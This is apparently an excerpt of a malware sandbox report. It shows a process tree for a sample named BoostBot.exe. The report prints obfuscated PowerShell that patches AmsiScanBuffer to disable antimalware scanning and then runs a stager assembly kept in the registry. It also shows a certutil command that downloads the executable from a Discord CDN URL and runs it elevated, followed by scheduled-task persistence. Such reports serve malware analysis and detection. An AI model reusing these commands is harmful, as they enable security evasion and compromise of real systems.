Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+'d'+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'T'+'y'+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'e'+''+[Char](97)+''+'l'+'ed'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+'A'+''+'u'+''+[Char](116)+'oCl'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nsNpTltMhLn.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+'e'+''+'c'+'i'+'a'+''+'l'+'N'+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+'d'+'e'+'B'+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$qMRvYQxVScxnqX).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+'m'+'e'+[Char](44)+''+'M'+''+'a'+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$nsNpTltMhLn.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'H'+'ide'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+','+''+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$DbEqhkFLNK,$qMRvYQxVScxnqX).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'ge'+'d'+'');Write-Output $nsNpTltMhLn.CreateType();}$LSgFxOaFlAScm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'Wi'+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+'f'+'e'+'N'+'a'+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+'h'+'o'+''+[Char](100)+''+[Char](115)+'');$QXMazkTOmigOwI=$LSgFxOaFlAScm.GetMethod(''+'G'+'etP'+[Char](114)+''+'o'+''+'c'+'Ad'+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+'a'+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IboAcloUaaduVeQsACp=ZzqpaqcSBnrT @([String])([IntPtr]);$kZnRNMWztoNXTIaiskjwMa=ZzqpaqcSBnrT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$flewVmahyHt=$LSgFxOaFlAScm.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'er'+[Char](110)+'e'+'l'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](100)+'ll')));$pZTVdhcvnVduFc=$QXMazkTOmigOwI.Invoke($Null,@([Object]$flewVmahyHt,[Object](''+[Char](76)+'oa'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$RyUSIOmDAmpnhxOTF=$QXMazkTOmigOwI.Invoke($Null,@([Object]$flewVmahyHt,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al'+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$mkRhfvN=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($pZTVdhcvnVduFc,$IboAcloUaaduVeQsACp).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$xtzyEzpKnlpxgyTgx=$QXMazkTOmigOwI.Invoke($Null,@([Object]$mkRhfvN,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+'f'+[Char](101)+''+'r'+'')));$vYhSdMJkvG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RyUSIOmDAmpnhxOTF,$kZnRNMWztoNXTIaiskjwMa).Invoke($xtzyEzpKnlpxgyTgx,[uint32]8,4,[ref]$vYhSdMJkvG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xtzyEzpKnlpxgyTgx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RyUSIOmDAmpnhxOTF,$kZnRNMWztoNXTIaiskjwMa).Invoke($xtzyEzpKnlpxgyTgx,[uint32]8,0x20,[ref]$vYhSdMJkvG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+'E').GetValue('$'+[Char](55)+''+'7'+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ScFyoeWuUeGR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zZmgxnMADZDFMD,[Parameter(Position=1)][Type]$zzqYBITArY)$gZOExmmvHsJ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+'c'+'tedD'+'e'+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+'r'+''+'y'+'Modul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'t'+[Char](101)+'Type',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+','+[Char](80)+''+[Char](117)+''+[Char](98)+'lic'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+'la'+[Char](115)+'s,'+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+'l'+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$gZOExmmvHsJ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+'ub'+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$zZmgxnMADZDFMD).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$gZOExmmvHsJ.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'e'+'B'+''+[Char](121)+'S'+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'Vi'+'r'+'t'+[Char](117)+''+'a'+'l',$zzqYBITArY,$zZmgxnMADZDFMD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+'e'+''+','+''+'M'+'an'+'a'+'g'+[Char](101)+''+[Char](100)+'');Write-Output $gZOExmmvHsJ.CreateType();}$GRekNZzPwYKiD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+'so'+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+'s');$UNgRdpllOOGoDe=$GRekNZzPwYKiD.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c,St'+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GVEpAkoBrkJjWCLZUKa=ScFyoeWuUeGR @([String])([IntPtr]);$mYJbrzqxBAnWNBhnnWHkgc=ScFyoeWuUeGR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IyilwnrJeWS=$GRekNZzPwYKiD.GetMethod(''+[Char](71)+'e'+[Char](116)+'M'+'o'+'du'+'l'+'e'+'H'+'andl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+''+'3'+''+'2'+''+[Char](46)+'d'+'l'+''+'l'+'')));$YYfqfofTSWmjOf=$UNgRdpllOOGoDe.Invoke($Null,@([Object]$IyilwnrJeWS,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+'r'+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$JabjiaIuufBJaaWUK=$UNgRdpllOOGoDe.Invoke($Null,@([Object]$IyilwnrJeWS,[Object](''+[Char](86)+'irtu'+[Char](97)+''+'l'+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$vcYtWLX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YYfqfofTSWmjOf,$GVEpAkoBrkJjWCLZUKa).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+'l');$vhyCeINYwbAJmOzOG=$UNgRdpllOOGoDe.Invoke($Null,@([Object]$vcYtWLX,[Object](''+'A'+'ms'+[Char](105)+''+'S'+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$ptWoBtGVAL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JabjiaIuufBJaaWUK,$mYJbrzqxBAnWNBhnnWHkgc).Invoke($vhyCeINYwbAJmOzOG,[uint32]8,4,[ref]$ptWoBtGVAL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vhyCeINYwbAJmOzOG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JabjiaIuufBJaaWUK,$mYJbrzqxBAnWNBhnnWHkgc).Invoke($vhyCeINYwbAJmOzOG,[uint32]8,0x20,[ref]$ptWoBtGVAL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue('$'+'7'+''+[Char](55)+''+'s'+''+'t'+'a'+'g'+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4668 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:OsclgELuOhGg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HJWjbvyboOzOdP,[Parameter(Position=1)][Type]$oALwqlRcFU)$DQmEgfEtWLy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+'l'+''+'e'+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+'e'+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+'r'+''+'y'+'M'+'o'+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+'l'+[Char](101)+'g'+'a'+'teT'+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'ed'+','+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+'A'+'u'+''+'t'+'o'+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+'',[MulticastDelegate]);$DQmEgfEtWLy.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'N'+'a'+''+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$HJWjbvyboOzOdP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'ti'+'m'+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$DQmEgfEtWLy.DefineMethod('In'+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+'g,'+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+'lo'+'t'+''+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+'u'+'a'+[Char](108)+'',$oALwqlRcFU,$HJWjbvyboOzOdP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $DQmEgfEtWLy.CreateType();}$akIsHeBWgncPg=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Syst'+[Char](101)+''+'m'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+'so'+[Char](102)+''+[Char](116)+''+'.'+'Wi'+'n'+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+'t'+''+[Char](104)+'o'+[Char](100)+'s');$VtelYOStNXeQtd=$akIsHeBWgncPg.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+'c'+'A'+'dd'+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+'t'+[Char](97)+'t'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$oQbwkLJmDpiwhtktNrR=OsclgELuOhGg @([String])([IntPtr]);$lvKXzdpYXBBvhIhpjAEDVg=OsclgELuOhGg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NhMoSJbEaKR=$akIsHeBWgncPg.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+'l')));$AMRxvhHZmkpuFG=$VtelYOStNXeQtd.Invoke($Null,@([Object]$NhMoSJbEaKR,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+'L'+'i'+''+[Char](98)+'r'+'a'+'r'+[Char](121)+''+[Char](65)+'')));$ARMhcaWxCyGUyUFxd=$VtelYOStNXeQtd.Invoke($Null,@([Object]$NhMoSJbEaKR,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$HialadU=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AMRxvhHZmkpuFG,$oQbwkLJmDpiwhtktNrR).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$OFIuTmPvgEwkvnqLY=$VtelYOStNXeQtd.Invoke($Null,@([Object]$HialadU,[Object]('A'+[Char](109)+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+'n'+[Char](66)+'uf'+[Char](102)+'e'+[Char](114)+'')));$fKTJBLZpob=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ARMhcaWxCyGUyUFxd,$lvKXzdpYXBBvhIhpjAEDVg).Invoke($OFIuTmPvgEwkvnqLY,[uint32]8,4,[ref]$fKTJBLZpob);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$OFIuTmPvgEwkvnqLY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ARMhcaWxCyGUyUFxd,$lvKXzdpYXBBvhIhpjAEDVg).Invoke($OFIuTmPvgEwkvnqLY,[uint32]8,0x20,[ref]$fKTJBLZpob);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$7'+[Char](55)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:4472 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1200
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1368
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1392
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1884
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1956
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1984
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2072
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2728
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2772
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3372
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3416
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fix.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\system32\certutil.execertutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe3⤵PID:2576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
PID:4924 -
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
PID:3056 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"6⤵
- Executes dropped EXE
PID:840 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "$sxr-powershell" /f6⤵PID:4072
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4180
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Avg54qrl4EQM.bat" "6⤵PID:4960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:4620 -
C:\Windows\SysWOW64\chcp.comchcp 650017⤵PID:1676
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost7⤵
- Runs ping.exe
PID:4676 -
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"6⤵
- Executes dropped EXE
PID:4912 -
